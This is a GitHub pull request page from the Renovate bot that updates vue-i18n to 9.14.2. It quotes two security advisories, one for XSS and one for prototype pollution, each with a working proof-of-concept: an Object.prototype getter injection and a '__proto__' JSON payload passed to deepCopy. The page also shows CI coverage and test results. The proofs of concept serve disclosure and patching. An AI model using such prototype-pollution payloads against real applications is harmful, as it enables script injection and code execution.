Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

fix(deps): update dependency vue-i18n to v9.14.2 [security] #1311

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

fix(deps): update dependency vue-i18n to v9.14.2 [security] #1311

wants to merge 1 commit into from

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented Dec 2, 2024

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
vue-i18n (source) 9.14.1 -> 9.14.2 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2024-52809

Vulnerability type

XSS

Description

vue-i18n can be passed locale messages to createI18n or useI18n.
we can then translate them using t and $t.
vue-i18n has its own syntax for local messages, and uses a message compiler to generate AST.
In order to maximize the performance of the translation function, vue-i18n uses bundler plugins such as @intlify/unplugin-vue-i18n and bulder to convert the AST in advance when building the application.
By using that AST as the locale message, it is no longer necessary to compile, and it is possible to translate using the AST.

The AST generated by the message compiler has special properties for each node in the AST tree to maximize performance. In the PoC example below, it is a static property, but that is just one of the optimizations.
About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts

In general, the locale messages of vue-i18n are optimized during production builds using @intlify/unplugin-vue-i18n,
so there is always a property that is attached during optimization like this time.
But if you are using a locale message AST in development mode or your own, there is a possibility of XSS if a third party injects.

Reproduce (PoC)

<!doctype html>
<html>
  <head>
    <meta charset="utf-8" />
    <title>vue-i18n XSS</title>
    <script src="https://unpkg.com/vue@3"></script>
    <script src="https://unpkg.com/vue-i18n@10"></script>
    <!-- Scripts that perform prototype contamination, such as being distributed from malicious hosting sites or injected through supply chain attacks, etc. -->
    <script>
      /**
       * Prototype pollution vulnerability with `Object.prototype`.
       * The 'static' property is part of the optimized AST generated by the vue-i18n message compiler.
       * About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts
       *
       * In general, the locale messages of vue-i18n are optimized during production builds using `@intlify/unplugin-vue-i18n`,
       * so there is always a property that is attached during optimization like this time.
       * But if you are using a locale message AST in development or your own, there is a possibility of XSS if a third party injects prototype pollution code.
       */
      Object.defineProperty(Object.prototype, 'static', {
        configurable: true,
        get() {
          alert('prototype polluted!')
          return 'prototype pollution'
        }
      })
    </script> 
 </head>
  <body>
    <div id="app">
      <p>{{ t('hello') }}</p>
    </div>
    <script>
      const { createApp } = Vue
      const { createI18n, useI18n } = VueI18n

      // AST style locale message, which build by `@intlify/unplugin-vue-i18n`
      const en = {
        hello: {
          type: 0,
          body: {
            items: [
              {
                type: 3,
                value: 'hello world!'
              }
            ]
          }
        }
      }

      const i18n = createI18n({
        legacy: false,
        locale: 'en',
        messages: {
          en
        }
      })

      const app = createApp({
        setup() {
          const { t } = useI18n()
          return { t }
        }
      })
      app.use(i18n)
      app.mount('#app')
    </script>
  </body>
</html>

Workarounds

Before v10.0.0, we can work around this vulnerability by using the regular compilation (jit: false of @intlify/unplugin-vue-i18n plugin configuration) way instead of jit compilation.

References

CVE-2024-52810

Vulnerability type: Prototype Pollution

Affected Package:

Product: @​intlify/shared
Version: 10.0.4

Vulnerability Location(s):

node_modules/@&#8203;intlify/shared/dist/shared.cjs:232:26

Description:

The latest version of @intlify/shared (10.0.4) is vulnerable to Prototype Pollution through the entry function(s) lib.deepCopy. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) the minimum consequence.

Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.

PoC:

// install the package with the latest version
~$ npm install @&#8203;intlify/shared@10.0.4
// run the script mentioned below 
~$ node poc.js
//The expected output (if the code still vulnerable) is below. 
// Note that the output may slightly differs from function to another.
Before Attack:  {}
After Attack:  {"pollutedKey":123}
(async () => {
const lib = await import('@&#8203;intlify/shared');
var someObj = {}
console.log("Before Attack: ", JSON.stringify({}.__proto__));
try {
// for multiple functions, uncomment only one for each execution.
lib.deepCopy (JSON.parse('{"__proto__":{"pollutedKey":123}}'), someObj)
} catch (e) { }
console.log("After Attack: ", JSON.stringify({}.__proto__));
delete Object.prototype.pollutedKey;
})();

References

Prototype Pollution Leading to Remote Code Execution - An example of how prototype pollution can lead to command code injection.

OWASP Prototype Pollution Prevention Cheat Sheet - Best practices for preventing prototype pollution.

PortSwigger Guide on Preventing Prototype Pollution - A detailed guide to securing your applications against prototype pollution.

Release Notes

intlify/vue-i18n (vue-i18n)

v9.14.2

Compare Source

What's Changed

🔒 Security Fixes

Full Changelog: intlify/vue-i18n@v9.14.1...v9.14.2

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@codecov Codecov
Copy link

codecov bot commented Dec 2, 2024
edited
Loading

Codecov Report

All modified and coverable lines are covered by tests ✅

Project coverage is 18.89%. Comparing base (bf96c7d) to head (a0e03f6).

Additional details and impacted files 
@@           Coverage Diff           @@
##           master    #1311   +/-   ##
=======================================
  Coverage   18.89%   18.89%           
=======================================
  Files         427      427           
  Lines       66953    66953           
  Branches     1452     1457    +5     
=======================================
+ Hits        12648    12649    +1     
+ Misses      54305    54304    -1
Flag Coverage Δ
unitTests 18.89% <ø> (+<0.01%) ⬆️

Flags with carried forward coverage won't be shown. Click here to find out more.

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

@github-actions GitHub Actions
Copy link

github-actions bot commented Dec 2, 2024
edited
Loading

Playwright test results

failed  16 failed
skipped  34 skipped

Details

stats  50 tests across 11 suites
duration  18 minutes, 22 seconds
commit  a0e03f6

Failed tests

chromium-setup › auth.setup.ts › authenticate as user - ( @primary @slow @read @development @staging @production )
chromium-setup › auth.setup.ts › authenticate as admin - ( @primary @slow @read @development @staging @production )
firefox-setup › auth.setup.ts › authenticate as user - ( @primary @slow @read @development @staging @production )
firefox-setup › auth.setup.ts › authenticate as admin - ( @primary @slow @read @development @staging @production )
chromium-setup › auth.setup.ts › authenticate as user - ( @primary @slow @read @development @staging @production )
chromium-setup › auth.setup.ts › authenticate as admin - ( @primary @slow @read @development @staging @production )
firefox-setup › auth.setup.ts › authenticate as user - ( @primary @slow @read @development @staging @production )
firefox-setup › auth.setup.ts › authenticate as admin - ( @primary @slow @read @development @staging @production )
chromium-setup › auth.setup.ts › authenticate as user - ( @primary @slow @read @development @staging @production )
chromium-setup › auth.setup.ts › authenticate as admin - ( @primary @slow @read @development @staging @production )
firefox-setup › auth.setup.ts › authenticate as user - ( @primary @slow @read @development @staging @production )
firefox-setup › auth.setup.ts › authenticate as admin - ( @primary @slow @read @development @staging @production )
chromium-setup › auth.setup.ts › authenticate as user - ( @primary @slow @read @development @staging @production )
chromium-setup › auth.setup.ts › authenticate as admin - ( @primary @slow @read @development @staging @production )
firefox-setup › auth.setup.ts › authenticate as user - ( @primary @slow @read @development @staging @production )
firefox-setup › auth.setup.ts › authenticate as admin - ( @primary @slow @read @development @staging @production )

Skipped tests

chromium › authentication.test.ts › Authentication › should load unauthorized routes as expected with and without authentication - ( @slow @primary @development @staging @production )
chromium › authentication.test.ts › Authentication › should redirect from login related unauthorized pages with existing session - ( @slow @primary @development @staging @production )
firefox › authentication.test.ts › Authentication › should load unauthorized routes as expected with and without authentication - ( @slow @primary @development @staging @production )
firefox › authentication.test.ts › Authentication › should redirect from login related unauthorized pages with existing session - ( @slow @primary @development @staging @production )
chromium › basic.test.ts › should have valid title & url - ( @fast @primary @read @development @staging @production )
chromium › basic.test.ts › should have valid localizations - ( @fast @primary @read @development @staging @production )
firefox › basic.test.ts › should have valid title & url - ( @fast @primary @read @development @staging @production )
firefox › basic.test.ts › should have valid localizations - ( @fast @primary @read @development @staging @production )
chromium › pages/dashboard.test.ts › DashboardPage › should have data-testids - ( @fast @primary @read @development @staging @production )
firefox › pages/dashboard.test.ts › DashboardPage › should have data-testids - ( @fast @primary @read @development @staging @production )
chromium › pages/login.test.ts › LoginPage › should login - ( @fast @primary @development @staging @production )
chromium › pages/login.test.ts › LoginPage › should show error on login with invalid credentials - ( @slow @primary @development @staging @production )
chromium › pages/login.test.ts › LoginPage › should have data-testids - ( @fast @primary @read @development @staging @production )
firefox › pages/login.test.ts › LoginPage › should login - ( @fast @primary @development @staging @production )
firefox › pages/login.test.ts › LoginPage › should show error on login with invalid credentials - ( @slow @primary @development @staging @production )
firefox › pages/login.test.ts › LoginPage › should have data-testids - ( @fast @primary @read @development @staging @production )
chromium › pages/myOrganization.test.ts › MyOrganization › should have visible data-testids - ( @primary @slow @read @development @staging @production )
firefox › pages/myOrganization.test.ts › MyOrganization › should have visible data-testids - ( @primary @slow @read @development @staging @production )
chromium › pages/myOrganization.test.ts › MyOrganization › Invitation Management: should display all required elements - ( @primary @slow @read @development @staging @production )
chromium › pages/myOrganization.test.ts › MyOrganization › User Management: should display all required elements - ( @primary @slow @read @development @staging @production )
chromium › pages/myOrganization.test.ts › MyOrganization › Organization Profile: should display all required elements - ( @primary @slow @read @development @staging @production )
firefox › pages/myOrganization.test.ts › MyOrganization › Invitation Management: should display all required elements - ( @primary @slow @read @development @staging @production )
firefox › pages/myOrganization.test.ts › MyOrganization › User Management: should display all required elements - ( @primary @slow @read @development @staging @production )
firefox › pages/myOrganization.test.ts › MyOrganization › Organization Profile: should display all required elements - ( @primary @slow @read @development @staging @production )
chromium › pages/otherOrganizations.test.ts › OtherOrganizations › should have visible data-testids - ( @primary @slow @read @development @staging @production )
firefox › pages/otherOrganizations.test.ts › OtherOrganizations › should have visible data-testids - ( @primary @slow @read @development @staging @production )
chromium › pages/phone.test.ts › PhonePage › should have visible data-testids - ( @primary @slow @read @development @staging @production )
firefox › pages/phone.test.ts › PhonePage › should have visible data-testids - ( @primary @slow @read @development @staging @production )
chromium › pages/training.test.ts › Training › should have visible data-testids - ( @primary @slow @read @development @staging @production )
firefox › pages/training.test.ts › Training › should have visible data-testids - ( @primary @slow @read @development @staging @production )
chromium › pages/user-profile.test.ts › UserProfile › should have visible data-testids - ( @primary @slow @read @development @staging @production )
firefox › pages/user-profile.test.ts › UserProfile › should have visible data-testids - ( @primary @slow @read @development @staging @production )
chromium › pages/work.test.ts › WorkPage › should have visible data-testids - ( @primary @slow @read @development @staging @production )
firefox › pages/work.test.ts › WorkPage › should have visible data-testids - ( @primary @slow @read @development @staging @production )

@renovate renovate bot force-pushed the renovate/npm-vue-i18n-vulnerability branch 2 times, most recently from 795f2ac to bb0685d Compare December 6, 2024 15:36
@renovate renovate bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from bb0685d to b8ca7b0 Compare December 13, 2024 15:34
@renovate renovate bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from b8ca7b0 to a0e03f6 Compare December 13, 2024 17:02
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
0 participants